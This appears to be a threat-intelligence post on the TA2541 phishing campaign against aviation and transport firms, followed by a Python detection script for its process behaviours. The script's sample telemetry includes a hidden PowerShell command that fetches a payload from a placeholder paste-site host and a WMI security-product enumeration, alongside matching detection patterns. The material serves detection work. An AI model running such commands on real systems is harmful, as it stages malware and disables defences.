A threat actor that has been active since at least 2017 has been seen targeting organizations in the aviation, aerospace, transportation, manufacturing, and defense industries, according to newly released research. This threat actor, tracked as TA2541, is believed to operate from Nigeria and uses mostly commodity and open-source malware to compromise its victims.
The primary infection vector used by TA2541 is phishing emails carrying malicious Microsoft Word documents; however, recent campaigns have seen the actor switch to links to malicious payloads hosted on cloud services such as Google Drive instead. When executed, these first-stage payloads drop commodity Remote Access Trojans (RATs) such as AsyncRAT, NetWire, WSH RAT, and Parallax to establish a backdoor on the system, using a long chain of processes in an attempt to hide their activity. The initial link or Microsoft Word document launches an obfuscated VBS script as its next payload, which in turn executes a PowerShell payload hosted on a paste site such as Pastetext or Sharetext. This payload then injects into a legitimate Windows process, where further PowerShell is executed to collect system information and disable security products. Once this has occurred, the RAT is downloaded and executed, allowing the threat actor to begin interacting with the victim system.
The lures used by TA2541 in these campaigns nearly always include transportation-related themes and keywords, such as flight, aircraft, fuel, yacht, etc. Unlike other phishing campaigns that may target key individuals in an organization, TA2541 has been seen sending thousands of emails to organizations, opting for a “spray-and-pray” style of attack rather than a stealthy operation. While their target does appear to be the transportation sector, their ultimate goal is currently unknown.
It is recommended to use proper email security controls, such as sandboxing or malware scanning, to help prevent phishing emails containing malware from reaching end users. Proper user training is also important so that end users can identify and report any malicious emails they receive. This threat actor is known to use off-the-shelf malware and little to no custom code, so maintaining proper endpoint security controls can go a long way toward preventing a system from being infected. The RATs used by this actor are well known, and any AV scanning engine is likely to have signatures for them. Likewise, proper endpoint logging and monitoring can help detect the behaviors these campaigns use. Behaviors such as PowerShell calling out to a paste hosting site, WMI querying for installed security products, and an executable beaconing to a C2 server can all be monitored for and alerted upon to help detect a potential infection. Binary Defense’s Managed Detection and Response service is an excellent asset to assist with these detection needs.
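The process-side behaviors listed above, as an added triage example that is not Binary Defense's code or detection content: it tags Sysmon-style process-creation records for an Office application spawning a script host, PowerShell fetching from one of the paste sites named in the post, and a script host querying WMI for installed security products. The sample events, host names and file paths are constructed placeholders.

```python
import re
from dataclasses import dataclass

# Indicators drawn from the post: paste hosting sites used for the PowerShell
# stage, and the WMI namespace/class a script queries to enumerate AV products.
PASTE_HOSTS = re.compile(r"\b(pastetext|sharetext)\.", re.IGNORECASE)
WMI_AV_QUERY = re.compile(r"SecurityCenter2|AntiVirusProduct", re.IGNORECASE)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe"}


@dataclass
class ProcEvent:
    """Minimal process-creation record (Sysmon event ID 1 style fields)."""
    image: str
    parent_image: str
    command_line: str


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> list[str]:
    """Return the TA2541-style behaviors one event exhibits (may be empty)."""
    name, parent = _basename(ev.image), _basename(ev.parent_image)
    tags = []
    if parent in OFFICE_APPS and name in SCRIPT_HOSTS:
        tags.append("office_spawns_script_host")    # Word doc -> VBS dropper
    if name == "powershell.exe" and PASTE_HOSTS.search(ev.command_line):
        tags.append("powershell_paste_site_fetch")  # next stage from paste site
    if name in SCRIPT_HOSTS and WMI_AV_QUERY.search(ev.command_line):
        tags.append("wmi_security_product_enum")    # AV discovery before tampering
    return tags


def triage(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Map event index -> tags, keeping only events that fired at least once."""
    return {i: t for i, ev in enumerate(events) if (t := classify(ev))}


# Constructed sample telemetry (not real logs); hosts and ids are placeholders.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\wscript.exe", r"C:\Office16\WINWORD.EXE",
              r"wscript.exe C:\Users\u\AppData\Local\Temp\invoice_flight.vbs"),
    ProcEvent(PS, r"C:\Windows\System32\wscript.exe",
              '-w hidden -nop -c "iwr https://pastetext.example/raw/CONSTRUCTED-ID"'),
    ProcEvent(PS, PS, r"-c Get-CimInstance -Namespace root\SecurityCenter2 -ClassName AntiVirusProduct"),
    ProcEvent(PS, r"C:\Windows\explorer.exe", "-c Get-Date"),  # benign, must not fire
]

if __name__ == "__main__":
    for i, tags in triage(SAMPLE_EVENTS).items():
        print(i, SAMPLE_EVENTS[i].command_line[:60], tags)
```

Each tag on its own is low-confidence; the chain (Office spawning a script host, then a paste-site fetch, then a WMI security-product query on the same host within minutes) is what merits an alert.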